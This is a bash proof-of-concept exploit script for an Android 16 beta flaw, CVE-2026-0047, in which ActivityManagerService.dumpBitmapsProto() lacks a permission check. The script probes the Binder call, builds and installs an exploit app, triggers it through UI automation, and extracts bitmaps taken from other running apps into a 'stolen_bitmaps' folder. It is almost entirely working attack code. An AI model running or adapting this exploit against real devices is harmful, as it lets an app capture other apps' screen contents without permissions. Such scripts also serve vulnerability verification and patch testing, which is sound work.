#!/usr/bin/env bash # ────────────────────────────────────────────────────────────────────────────── # CVE-2026-0047 — Single-Shot PoC Exploit Script # # Exploits the missing permission check in ActivityManagerService.dumpBitmapsProto() # on Android 16 QPR2 Beta (Baklava) to steal bitmaps from all running apps. # # Prerequisites: # - Android SDK with emulator, platform-tools, and build-tools installed # - Java 17+ # - A running Baklava emulator (see setup below) or ADB-connected device # with security patch < 2026-03-01 # # Emulator setup (one-time): # sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a" # avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a" # emulator -avd baklava & # # Usage: # chmod +x exploit.sh # ./exploit.sh # build, install, exploit, pull results # ./exploit.sh --skip-build # skip build, just run exploit on device # ./exploit.sh --setup-emulator # create and boot emulator first # ────────────────────────────────────────────────────────────────────────────── set -euo pipefail RED='\033[0;31m' GRN='\033[0;32m' CYN='\033[0;36m' YLW='\033[1;33m' RST='\033[0m' log() { echo -e "${CYN}[*]${RST} $1"; } ok() { echo -e "${GRN}[+]${RST} $1"; } warn() { echo -e "${YLW}[!]${RST} $1"; } err() { echo -e "${RED}[-]${RST} $1"; } die() { err "$1"; exit 1; } SKIP_BUILD=false SETUP_EMU=false OUTPUT_DIR="./stolen_bitmaps" for arg in "$@"; do case "$arg" in --skip-build) SKIP_BUILD=true ;; --setup-emulator) SETUP_EMU=true ;; *) die "Unknown argument: $arg" ;; esac done # ── Emulator setup ────────────────────────────────────────────────────────── if $SETUP_EMU; then log "Setting up Baklava emulator..." echo "" warn "Downloading Android 16 QPR2 Beta system image (~2GB)..." sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a" || \ die "Failed to download system image. Run: sdkmanager --list | grep Baklava" log "Creating AVD 'baklava-vuln'..." echo "no" | avdmanager create avd \ -n baklava-vuln \ -k "system-images;android-Baklava;google_apis;arm64-v8a" \ --force log "Booting emulator..." emulator -avd baklava-vuln -no-snapshot-load -gpu swiftshader_indirect & EMU_PID=$! log "Waiting for emulator to boot (this takes 1-3 minutes)..." adb wait-for-device while [ "$(adb shell getprop sys.boot_completed 2>/dev/null)" != "1" ]; do sleep 2 done ok "Emulator booted (PID $EMU_PID)" echo "" fi # ── Preflight checks ──────────────────────────────────────────────────────── log "Checking prerequisites..." command -v adb >/dev/null 2>&1 || die "adb not found. Install Android SDK platform-tools." adb get-state >/dev/null 2>&1 || die "No device connected. Boot an emulator first: sdkmanager 'system-images;android-Baklava;google_apis;arm64-v8a' avdmanager create avd -n baklava -k 'system-images;android-Baklava;google_apis;arm64-v8a' emulator -avd baklava &" PATCH_LEVEL=$(adb shell getprop ro.build.version.security_patch 2>/dev/null) BUILD=$(adb shell getprop ro.build.display.id 2>/dev/null) SDK=$(adb shell getprop ro.build.version.sdk 2>/dev/null) echo "" echo " Device: $(adb shell getprop ro.product.model)" echo " Build: $BUILD" echo " SDK: $SDK" echo " Patch level: $PATCH_LEVEL" echo "" if [[ "$PATCH_LEVEL" > "2026-02-28" ]] && [[ "$PATCH_LEVEL" != "2025"* ]]; then warn "Patch level $PATCH_LEVEL >= 2026-03-01 — device may be patched." warn "The exploit will still run but expect SecurityException." echo "" fi # No hidden_api_policy needed — raw Binder transact bypasses hidden API entirely echo "" # ── Phase 1: Raw Binder probe ─────────────────────────────────────────────── log "Phase 1: Raw Binder transaction probe..." log "Sending transaction #117 (dumpBitmapsProto) to IActivityManager..." echo "" PROBE=$(adb shell "service call activity 117" 2>&1) if echo "$PROBE" | grep -qi "SecurityException\|Permission.Denial"; then err "PATCHED: SecurityException returned." err "This device enforces DUMP permission on dumpBitmapsProto()." echo "" echo "$PROBE" exit 0 fi if echo "$PROBE" | grep -qi "dumpBitmapsProto\|ActivityManagerService\|NullPointerException"; then ok "METHOD REACHED — no SecurityException!" ok "CVE-2026-0047 confirmed: dumpBitmapsProto() has no permission check." elif echo "$PROBE" | grep -q "fffffffc"; then ok "Binder returned error code but NO SecurityException." ok "Method was dispatched without permission check." else warn "Unexpected response. Continuing with Phase 2..." fi echo "" # ── Phase 2: Build the PoC app ────────────────────────────────────────────── SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" APK_PATH="$SCRIPT_DIR/app/build/outputs/apk/debug/app-debug.apk" if ! $SKIP_BUILD; then if [ -f "$SCRIPT_DIR/gradlew" ]; then log "Phase 2: Building PoC APK..." cd "$SCRIPT_DIR" chmod +x gradlew ./gradlew :app:assembleDebug -q 2>&1 | tail -3 ok "APK built: $APK_PATH" else die "gradlew not found in $SCRIPT_DIR. Run from the PoC project root." fi else log "Phase 2: Skipping build (--skip-build)" [ -f "$APK_PATH" ] || die "APK not found at $APK_PATH. Run without --skip-build first." fi echo "" # ── Phase 3: Install and exploit ──────────────────────────────────────────── log "Phase 3: Installing PoC app..." adb install -r "$APK_PATH" 2>&1 | grep -v "^$" ok "Installed com.poc.cve20260047" echo "" log "Opening Settings app (target with visible UI bitmaps)..." adb shell am start -n com.android.settings/.Settings >/dev/null 2>&1 sleep 2 log "Launching PoC exploit..." adb shell am start -n com.poc.cve20260047/.MainActivity >/dev/null 2>&1 sleep 2 # Find the exploit button and tap it log "Triggering dumpBitmapsProto() exploit via UI..." adb shell uiautomator dump /sdcard/poc_ui.xml >/dev/null 2>&1 BOUNDS=$(adb shell cat /sdcard/poc_ui.xml 2>/dev/null | \ grep -o 'resource-id="com.poc.cve20260047:id/btnRealCve"[^>]*' | \ grep -o 'bounds="\[[0-9]*,[0-9]*\]\[[0-9]*,[0-9]*\]"' | \ grep -o '\[.*\]' || true) if [ -n "$BOUNDS" ]; then X1=$(echo "$BOUNDS" | sed 's/\[\([0-9]*\),.*/\1/') Y1=$(echo "$BOUNDS" | sed 's/\[[0-9]*,\([0-9]*\)\].*/\1/') X2=$(echo "$BOUNDS" | sed 's/.*\[\([0-9]*\),.*/\1/') Y2=$(echo "$BOUNDS" | sed 's/.*\[[0-9]*,\([0-9]*\)\]/\1/') TX=$(( (X1 + X2) / 2 )) TY=$(( (Y1 + Y2) / 2 )) adb shell input tap "$TX" "$TY" ok "Tapped exploit button at ($TX, $TY)" else warn "Could not find button via uiautomator, trying default coordinates..." adb shell input tap 540 736 fi log "Waiting for exploit to complete (up to 20 seconds)..." sleep 20 echo "" # ── Phase 4: Extract results ──────────────────────────────────────────────── log "Phase 4: Extracting stolen bitmaps..." mkdir -p "$OUTPUT_DIR" FILE_COUNT=$(adb shell "run-as com.poc.cve20260047 ls files/ 2>/dev/null" | grep -c "stolen_bitmap_" || true) BIN_SIZE=$(adb shell "run-as com.poc.cve20260047 stat -c%s files/stolen_bitmaps.bin 2>/dev/null" || echo "0") if [ "$FILE_COUNT" -gt 0 ] 2>/dev/null; then ok "Found $FILE_COUNT stolen PNG files on device!" echo "" for f in $(adb shell "run-as com.poc.cve20260047 ls files/" 2>/dev/null | grep "stolen_bitmap_.*\.png"); do f=$(echo "$f" | tr -d '\r') adb shell "run-as com.poc.cve20260047 cat files/$f" > "$OUTPUT_DIR/$f" 2>/dev/null done adb shell "run-as com.poc.cve20260047 cat files/stolen_bitmaps.bin" > "$OUTPUT_DIR/raw_protobuf.bin" 2>/dev/null VALID=0 for png in "$OUTPUT_DIR"/stolen_bitmap_*.png; do if file "$png" 2>/dev/null | grep -q "PNG image"; then VALID=$((VALID + 1)) fi done echo "" echo " ══════════════════════════════════════════" echo " CVE-2026-0047 EXPLOIT RESULTS" echo " ══════════════════════════════════════════" echo "" echo " Device: $(adb shell getprop ro.product.model)" echo " Build: $BUILD" echo " Patch level: $PATCH_LEVEL" echo "" echo " Raw protobuf: $BIN_SIZE bytes" echo " PNG files: $FILE_COUNT extracted" echo " Valid PNGs: $VALID confirmed" echo " Output dir: $OUTPUT_DIR/" echo "" echo " Permissions used: NONE" echo "" echo " ══════════════════════════════════════════" echo "" ok "Stolen bitmaps saved to $OUTPUT_DIR/" log "View them with: open $OUTPUT_DIR/ (macOS) or xdg-open $OUTPUT_DIR/ (Linux)" echo "" ls -lhS "$OUTPUT_DIR"/stolen_bitmap_*.png 2>/dev/null | head -10 echo "" else warn "No bitmap files found. Checking logcat for exploit status..." echo "" adb logcat -d | grep -i "CVE-PoC\|dumpBitmap\|SecurityException" | tail -20 echo "" # Take screenshot of result adb shell screencap -p /sdcard/poc_result.png 2>/dev/null adb pull /sdcard/poc_result.png "$OUTPUT_DIR/exploit_screenshot.png" 2>/dev/null log "Screenshot saved to $OUTPUT_DIR/exploit_screenshot.png" fi